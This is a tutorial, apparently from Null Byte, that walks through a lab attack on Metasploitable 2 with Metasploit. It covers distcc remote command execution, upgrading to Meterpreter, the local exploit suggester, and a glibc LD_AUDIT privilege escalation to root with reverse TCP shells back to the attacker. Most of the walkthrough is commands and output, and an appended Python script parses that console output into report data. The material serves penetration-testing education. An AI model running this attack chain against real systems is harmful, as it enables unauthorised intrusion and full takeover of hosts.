
How do I get root with Metasploit's Local Exploit Suggester? (Null Byte :: WonderHowTo)



You have managed to get a shell on the target, but you have very low privileges. What now? Privilege escalation is a wide field and can be one of the most rewarding, but also the most frustrating, phases of an attack. We could go the manual route, but as always, Metasploit makes it easy to perform local privilege escalation and become root with its Local Exploit Suggester module.

To walk through the process, we use Kali Linux as the attacking machine and Metasploitable 2 as the target. You can set up the same or a similar pentesting lab to follow the instructions below.

Step 1: Align the Session to the Goal

First, we need to obtain a low-privileged session on the target. With Metasploit this is easily done. Type msfconsole in the terminal to start it.

~ $ msfconsole

[-] *** Starting the Metasploit Framework console...
[-] * WARNING: No database support: No database YAML file
[-]

[ASCII art banner omitted]

       =[ metasploit v5.0.20-dev                          ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 >

Metasploitable includes a vulnerable service called distccd, which is used to distribute program compilation across multiple systems, speeding things up by pooling their processor capacity. Unfortunately, this version of the program lets an attacker execute arbitrary commands on the server.

We can find the exploit with the search command:

msf5 > search distcc

Matching Modules
================

   #  Name                          Disclosure Date  Rank       Check  Description
   -  ----                          ---------------  ----       -----  -----------
   0  exploit/unix/misc/distcc_exec  2002-02-01       excellent  Yes    DistCC Daemon Command Execution

To load the module, enter use followed by the module's full path:

msf5 > use exploit/unix/misc/distcc_exec

The available settings can now be displayed with the options command:

msf5 exploit(unix/misc/distcc_exec) > options

Module options (exploit/unix/misc/distcc_exec):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target address range or CIDR identifier
   RPORT   3632             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

It looks like we only need to set the remote host address, since the remote port is already filled in with the default port number. Use the set command to specify the IP address of the target:

msf5 exploit(unix/misc/distcc_exec) > set rhosts 10.10.0.50

rhosts => 10.10.0.50

Now we can launch the exploit. Use the run command, which is just a shorter alias for exploit:

msf5 exploit(unix/misc/distcc_exec) > run

[*] Started reverse TCP double handler on 10.10.0.1:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo sWI9yfQYbPxuIGrh;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "sWI9yfQYbPxuIGrh\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.0.1:4444 -> 10.10.0.50:58006) at 2019-11-19 11:46:02 -0500

uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

We can see that a command shell has been opened and running uname -a confirms that we have compromised the target.

Step 2: Upgrade to Meterpreter

To use Metasploit's local exploit suggester, we need to upgrade our basic Unix command shell to a Meterpreter session. While still in the basic command shell, press Ctrl-Z to background the session. Press y when prompted.

Background session 1? [y/N]  y
msf5 exploit(unix/misc/distcc_exec) >

We now return to Metasploit's main prompt and can review all sessions running in the background with the sessions command:

msf5 exploit(unix/misc/distcc_exec) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               10.10.0.1:4444 -> 10.10.0.50:58006 (10.10.0.50)

The easiest way to upgrade a regular shell to a Meterpreter session is to use the -u flag followed by the number of the session to upgrade:

msf5 exploit(unix/misc/distcc_exec) > sessions -u 1

[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.0.1:4433
[*] Sending stage (985320 bytes) to 10.10.0.50
[*] Meterpreter session 2 opened (10.10.0.1:4433 -> 10.10.0.50:32979) at 2019-06-19 11:47:52 -0500
[*] Command stager progress: 100.00% (773/773 bytes)

We can see the post module running, and a new session opens. We can verify this with the sessions command again:

msf5 exploit(unix/misc/distcc_exec) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                                 Connection
  --  ----  ----                   -----------                                                 ----------
  1         shell cmd/unix                                                                     10.10.0.1:4444 -> 10.10.0.50:58006 (10.10.0.50)
  2         meterpreter x86/linux  uid=1, gid=1, euid=1, egid=1 @ metasploitable.localdomain  10.10.0.1:4433 -> 10.10.0.50:32979 (10.10.0.50)

We can interact with our new Meterpreter session using the -i flag followed by the number of the session we want:

msf5 exploit(unix/misc/distcc_exec) > sessions -i 2

[*] Starting interaction with 2...

meterpreter >

Step 3: Run Exploit Suggester

Metasploit post modules run against a backgrounded session rather than from inside the session itself, so background session 2 (our Meterpreter shell) and return to the main prompt. Then we can load the local exploit suggester with the following command:

msf5 exploit(unix/misc/distcc_exec) > use post/multi/recon/local_exploit_suggester

If we look at the options, all we have to do is specify the session to run the module against:

msf5 post(multi/recon/local_exploit_suggester) > options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

Just set the session to number 2, which is our Meterpreter shell:

msf5 post(multi/recon/local_exploit_suggester) > set session 2

session => 2

And to start it, enter run:

msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.0.50 - Collecting local exploits for x86/linux...
[*] 10.10.0.50 - 26 exploit checks are being tried...
[+] 10.10.0.50 - exploit/linux/local/glibc_ld_audit_dso_load_priv_esc: The target appears to be vulnerable.
[+] 10.10.0.50 - exploit/linux/local/glibc_origin_expansion_priv_esc: The target appears to be vulnerable.
[+] 10.10.0.50 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
[*] Post module execution completed

We can see that the module checks a bunch of local exploits and returns a few that seem feasible. Brilliant.

Step 4: Get Root

Lastly, we need to use one of these exploits to get root on the system. We will try the first one suggested to us. It exploits a vulnerability in the glibc dynamic linker where the LD_AUDIT environment variable allows a setuid object to be loaded, which eventually executes with root privileges.

msf5 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc

If we look at the options, all we have to do is set the session again; the default SUID executable path works for now:

msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > options

Module options (exploit/linux/local/glibc_ld_audit_dso_load_priv_esc):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on.
   SUID_EXECUTABLE  /bin/ping        yes       Path to a SUID executable


Exploit target:

   Id  Name
   --  ----
   0   Automatic

Set the session as before:

msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set session 2

session => 2

We can also set the payload so that we get another Meterpreter session once the exploit completes:

msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set payload linux/x86/meterpreter/reverse_tcp

payload => linux/x86/meterpreter/reverse_tcp

And set the appropriate listener host (the IP address of our local machine) and port:

msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set lhost 10.10.0.1

lhost => 10.10.0.1

msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set lport 4321

lport => 4321

Finally, enter run to start the exploit:

msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > run

[*] Started reverse TCP handler on 10.10.0.1:4321
[+] The target appears to be vulnerable
[*] Using target: Linux x86
[*] Writing '/tmp/.BlrZu4n' (1271 bytes) ...
[*] Writing '/tmp/.18qZUt' (281 bytes) ...
[*] Writing '/tmp/.DoiFwlxPt' (207 bytes) ...
[*] Launching exploit...
[*] Sending stage (985320 bytes) to 10.10.0.50
[*] Meterpreter session 3 opened (10.10.0.1:4321 -> 10.10.0.50:56950) at 2019-11-19 11:57:19 -0500

meterpreter >

We now have a new Meterpreter session on the target and can drop into a shell to verify that we have root access:

meterpreter > shell
Process 4886 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=1(daemon)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
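When running this workflow across more than one box, the parts worth keeping are the sessions table from Step 2, the suggester's findings from Step 3, and the id output from Step 4. The following Python script is an added example for turning those three console outputs into report data; it is not part of the original article and not a Metasploit tool. The sample outputs embedded below are constructed, modelled on the lines shown above, and the regular expressions assume Metasploit 5's console formatting.

```python
"""Triage helper for Metasploit console output (added example, not Metasploit code).

Parses three things shown in the walkthrough:
  * the `sessions` table          -> which sessions exist and whether any has euid 0
  * local_exploit_suggester output -> which local exploit modules reported the target vulnerable
  * `id` output from a shell       -> whether the shell is actually root
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample output, modelled on the Step 3 run above (not a live capture).
SUGGESTER_OUTPUT = """\
[*] 10.10.0.50 - Collecting local exploits for x86/linux...
[*] 10.10.0.50 - 26 exploit checks are being tried...
[+] 10.10.0.50 - exploit/linux/local/glibc_ld_audit_dso_load_priv_esc: The target appears to be vulnerable.
[+] 10.10.0.50 - exploit/linux/local/glibc_origin_expansion_priv_esc: The target appears to be vulnerable.
[+] 10.10.0.50 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
[*] Post module execution completed
"""

# Constructed sample `sessions` table: sessions 1 and 2 as in Step 2, plus the root
# session 3 that Step 4 produced.
SESSIONS_OUTPUT = """\
Active sessions
===============

  Id  Name  Type                   Information                                                 Connection
  --  ----  ----                   -----------                                                 ----------
  1         shell cmd/unix                                                                     10.10.0.1:4444 -> 10.10.0.50:58006 (10.10.0.50)
  2         meterpreter x86/linux  uid=1, gid=1, euid=1, egid=1 @ metasploitable.localdomain  10.10.0.1:4433 -> 10.10.0.50:32979 (10.10.0.50)
  3         meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0 @ metasploitable.localdomain  10.10.0.1:4321 -> 10.10.0.50:56950 (10.10.0.50)
"""

# "[+] <host> - <module>: <status>" lines are the suggester's positive findings.
SUGGESTION_RE = re.compile(r"^\[\+\]\s+(?P<host>\S+)\s+-\s+(?P<module>\S+):\s+(?P<status>.+?)\s*$")
# A session row starts with a numeric Id; the Name column may be blank, so we
# locate the Type column by its keyword rather than by splitting on whitespace.
SESSION_RE = re.compile(r"^\s*(?P<id>\d+)\s+.*?(?P<type>shell|meterpreter)\s+(?P<platform>\S+)")
EUID_RE = re.compile(r"\beuid=(\d+)")
CONN_RE = re.compile(r"(?P<local>\S+) -> (?P<remote>\S+) \((?P<host>[^)]+)\)")
# `id` prints fields like uid=0(root); groups=... is deliberately not matched.
ID_RE = re.compile(r"\b(uid|gid|euid|egid)=(\d+)\((\w+)\)")


@dataclass
class Suggestion:
    host: str
    module: str
    status: str


@dataclass
class Session:
    id: int
    type: str
    platform: str
    euid: Optional[int]   # None for a plain cmd/unix shell, which reports no uid
    target: Optional[str]

    @property
    def privileged(self) -> bool:
        return self.euid == 0


def parse_suggester(output: str) -> List[Suggestion]:
    """Return one Suggestion per module the suggester flagged with [+]."""
    return [Suggestion(m["host"], m["module"], m["status"])
            for m in map(SUGGESTION_RE.match, output.splitlines()) if m]


def parse_sessions(output: str) -> List[Session]:
    """Return one Session per row of the `sessions` table."""
    sessions = []
    for line in output.splitlines():
        m = SESSION_RE.match(line)
        if not m:
            continue
        euid = EUID_RE.search(line)
        conn = CONN_RE.search(line)
        sessions.append(Session(int(m["id"]), m["type"], m["platform"],
                                int(euid.group(1)) if euid else None,
                                conn["host"] if conn else None))
    return sessions


def parse_id(output: str) -> Dict[str, Tuple[int, str]]:
    """Map uid/gid/euid/egid -> (number, name) from the output of `id`."""
    return {name: (int(num), who) for name, num, who in ID_RE.findall(output)}


def is_root(id_output: str) -> bool:
    """True when `id` reports uid 0, the check the walkthrough performs in Step 4."""
    return parse_id(id_output).get("uid", (None, ""))[0] == 0


if __name__ == "__main__":
    for s in parse_suggester(SUGGESTER_OUTPUT):
        print(f"{s.host}: {s.module} -> {s.status}")
    for sess in parse_sessions(SESSIONS_OUTPUT):
        print(f"session {sess.id} ({sess.type} {sess.platform}) on {sess.target}: "
              f"{'ROOT' if sess.privileged else 'unprivileged'}")
    print("root shell:", is_root("uid=0(root) gid=0(root) groups=1(daemon)"))
```

The euid check on the sessions table is the quick way to see which sessions still need escalation before re-running the suggester, and the id parser gives the same answer from inside a shell.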

Summary

In this tutorial, we learned how to use Metasploit to get a shell on the target, upgrade it to a Meterpreter session, and use the local exploit suggester module to eventually become root on the system. Metasploit not only facilitates initial exploitation but also the post-exploitation phase. In the next article we will examine some useful post modules for quickly gathering information about the target.

Cover image by Pixabay/Pexels; screenshots by drd_/Null Byte